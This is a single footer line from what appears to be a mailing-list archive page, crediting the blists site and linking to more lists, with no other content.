Powered by blists - more mailing lists